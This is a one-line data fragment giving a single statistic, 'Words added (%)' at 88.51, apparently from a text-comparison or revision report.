Words added (%)	88.51